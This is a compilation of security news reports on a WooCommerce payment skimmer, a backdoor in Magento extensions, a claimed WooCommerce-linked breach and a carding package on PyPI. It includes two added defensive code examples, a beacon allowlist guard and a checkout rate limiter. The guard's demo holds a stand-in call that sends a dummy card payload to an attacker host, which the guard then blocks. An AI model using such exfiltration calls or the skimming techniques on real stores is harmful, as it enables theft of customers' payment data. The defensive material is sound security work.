@securityonline.info
A new and stealthy formjacking malware has been discovered targeting WooCommerce, the popular e-commerce plugin for WordPress. The malware discreetly steals customer payment data from legitimate checkout processes, posing a significant threat to online businesses. Unlike traditional skimmers that simply overlay payment forms, this malware integrates seamlessly into the checkout process, exfiltrating sensitive customer data without raising immediate suspicion.
The malware injects a fake payment form into legitimate checkout pages, closely mimicking the design and behaviour of the real one. It captures card numbers, expiration dates, CVVs, and personal details such as names and addresses. To evade detection it uses the browser's localStorage to collect and hold cardholder data silently, which gives the stolen data persistence and makes forensic recovery harder.

Exfiltration is triggered when the "Place Order" button is pressed: the malware calls navigator.sendBeacon() to transmit the data asynchronously and silently to a remote command-and-control (C2) server.

The infection vector is believed to be compromised WordPress admin accounts. Attackers inject malicious JavaScript through plugins such as Simple Custom CSS and JS, whose purpose is to insert code into pages dynamically. The injected script monitors user input on the checkout fields continuously, so data is captured even if the purchase is never completed.

Security experts recommend robust countermeasures, including regular security audits, up-to-date software, and careful monitoring of third-party dependencies, to protect against attacks of this kind.
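One defensive control against the exfiltration path described above is to restrict where beacons may go. The following is an added example, not code from the article or from any of the projects it names: it wraps `navigator.sendBeacon` so that only allowlisted origins can receive a beacon and every refused attempt is recorded for review. The fake navigator, the page origin, the allowlist and the payload are all constructed for the demo.

```javascript
// Added example: guard navigator.sendBeacon with an origin allowlist.
// `nav` is any object carrying a sendBeacon function (the real navigator in a
// browser, a stand-in here). Returns the list of blocked attempts so a page
// can report them to its own telemetry.
function installBeaconGuard(nav, { pageOrigin, allowedOrigins, onBlocked }) {
  const original = typeof nav.sendBeacon === 'function' ? nav.sendBeacon.bind(nav) : null;
  const blocked = [];

  nav.sendBeacon = function guardedSendBeacon(url, data) {
    let target;
    try {
      // Resolve relative URLs against the page origin, as the browser would.
      target = new URL(String(url), pageOrigin);
    } catch (e) {
      const event = { url: String(url), origin: null, reason: 'unparseable URL' };
      blocked.push(event);
      if (onBlocked) onBlocked(event);
      return false;
    }
    if (!allowedOrigins.includes(target.origin)) {
      const event = {
        url: target.href,
        origin: target.origin,
        reason: 'origin not allowlisted',
        bytes: typeof data === 'string' ? data.length : null,
      };
      blocked.push(event);
      if (onBlocked) onBlocked(event);
      return false; // same value the browser returns when it refuses to queue a beacon
    }
    return original ? original(url, data) : true;
  };

  return { blocked, original };
}

// Demo with a constructed navigator: one first-party beacon, one to an unknown
// origin (what a skimmer would attempt), one with a URL that does not parse.
function demo() {
  const queued = [];
  const fakeNavigator = {
    sendBeacon(url, data) { queued.push({ url, data }); return true; },
  };
  const guard = installBeaconGuard(fakeNavigator, {
    pageOrigin: 'https://shop.example',                       // constructed
    allowedOrigins: ['https://shop.example', 'https://analytics.example'], // constructed
  });
  const payload = JSON.stringify({ card: 'CONSTRUCTED-DUMMY-VALUE' }); // constructed
  const results = [
    fakeNavigator.sendBeacon('/checkout/metrics', 'ok'),        // first-party: allowed
    fakeNavigator.sendBeacon('https://attacker.invalid/c', payload), // unknown origin: blocked
    fakeNavigator.sendBeacon('https://', payload),               // unparseable: blocked
  ];
  return { results, queued, blocked: guard.blocked };
}
```

Install the guard before any third-party or plugin-injected script runs (that is, early in the document head), otherwise a script that captured a reference to the original `sendBeacon` first is unaffected. A Content-Security-Policy `connect-src` directive enforces the same origin restriction at the browser level and does not depend on script ordering, so the wrapper is best treated as a detection layer on top of CSP rather than a replacement for it.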
Pierluigi Paganini@Security Affairs
A recent supply chain attack has targeted Magento e-commerce stores, compromising hundreds of online businesses. Sansec researchers uncovered that 21 Magento extensions had been backdoored, leading to the compromise of an estimated 500 to 1,000 e-commerce stores, including a major multinational corporation valued at $40 billion. The attackers gained access to the servers of three Magento software developers – Magesolution, Meetanshi, and Tigren – and modified the source code of the extensions.
The malicious code, a backdoor hidden in the License.php file, remained dormant for six years. The attackers exploited the backdoor in April 2025, deploying malicious code onto Magento stores that had installed the compromised plugins. The backdoor allowed whoever held its key to run commands on the server, giving them full control of the e-commerce servers and the ability to steal sensitive information.

Removing the compromised extensions eliminates the initial entry point, but experts recommend a thorough check of affected stores to ensure the attackers did not leave additional web shells for secondary access. Sansec has notified the plugin developers of the breach; responses have varied, ranging from denial to confirmation of a server hack. Users of Magento e-commerce platforms are urged to review their installed extensions and put controls in place to mitigate the risks of supply chain attacks.
@cybersecuritynews.com
A hacker using the alias "Satanic" has claimed responsibility for a significant data breach affecting WooCommerce, a widely used eCommerce platform. The breach, said to have occurred on April 6, 2025, reportedly compromised over 4.4 million user records. According to the hacker's posts on Breach Forums, the data was not directly extracted from WooCommerce's core infrastructure but from systems closely linked to websites utilizing the platform, potentially through third-party integrations such as CRM or marketing automation tools. The alleged breach has raised concerns about the security of third-party integrations within the WooCommerce ecosystem.
The compromised database reportedly includes an extensive array of sensitive information: 4,432,120 individual records, 1.3 million unique email addresses, and 998,000 phone numbers. It also encompasses metadata on corporate websites, such as technology stacks and payment solutions. A sample of the stolen data reveals records from prominent organizations including the National Institute of Standards and Technology (NIST), Texas.gov, NVIDIA Corporation, the New York City Department of Education, and Oxford University Press. Each record contains the kind of detail typically found in marketing databases: estimated revenue, marketing platforms, hosting providers, and social media links.

Adding to the woes of WooCommerce users, a separate threat has emerged with the discovery of a malicious Python package named "disgrasya" on PyPI. The package, detected by the Socket Research Team, contains an automated carding script designed specifically to target WooCommerce stores that use CyberSource as their payment gateway. The malware simulates legitimate user behavior to avoid detection while exfiltrating stolen credit card data. Organizations are advised to enable fraud protection rules, monitor for suspicious patterns, implement CAPTCHA or bot protection, and rate limit checkout and payment endpoints to mitigate the risk of automated carding attacks.
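Rate limiting the checkout and payment endpoints is the last mitigation listed above; the following is an added example of how that can be done, not code from the article, from Socket or from WooCommerce. It is a sliding-window limiter keyed by client, with an injectable clock so the behaviour can be shown without waiting. The limit, window, client keys and timestamps are constructed for the demo.

```javascript
// Added example: sliding-window rate limiter for checkout/payment endpoints.
// Each key (client IP, session id, or a combination) may make at most `limit`
// requests in any `windowMs` span. `now` is injectable for testing.
class SlidingWindowLimiter {
  constructor({ limit, windowMs, now = () => Date.now() }) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.now = now;
    this.hits = new Map(); // key -> timestamps of requests inside the window
  }

  // Record one request for `key` and decide whether it may proceed.
  check(key) {
    const t = this.now();
    const cutoff = t - this.windowMs;
    const recent = (this.hits.get(key) || []).filter((ts) => ts > cutoff);
    if (recent.length >= this.limit) {
      this.hits.set(key, recent);
      // Oldest hit in the window decides when the client may retry.
      return { allowed: false, remaining: 0, retryAfterMs: recent[0] + this.windowMs - t };
    }
    recent.push(t);
    this.hits.set(key, recent);
    return { allowed: true, remaining: this.limit - recent.length, retryAfterMs: 0 };
  }
}

// Demo: one client hammers the payment endpoint eight times in eight seconds
// against a limit of five per minute; a second client is unaffected; the first
// client is allowed again once the window has rolled past its earlier hits.
function demo() {
  let clock = 0; // constructed virtual clock in milliseconds
  const limiter = new SlidingWindowLimiter({ limit: 5, windowMs: 60000, now: () => clock });

  const burst = [];
  for (let i = 0; i < 8; i++) {
    clock += 1000;
    burst.push(limiter.check('203.0.113.7')); // constructed client key
  }
  const other = limiter.check('198.51.100.9').allowed; // constructed second client
  clock += 60000;
  const later = limiter.check('203.0.113.7').allowed;

  return { burst, other, later };
}
```

Carding bots rotate source addresses, so keying on IP alone is weak; keying on the session or cart as well, and lowering the limit for repeated declines from the gateway, catches more of the pattern the article describes. The limiter is one layer and is meant to sit alongside the CAPTCHA and gateway fraud rules listed with it.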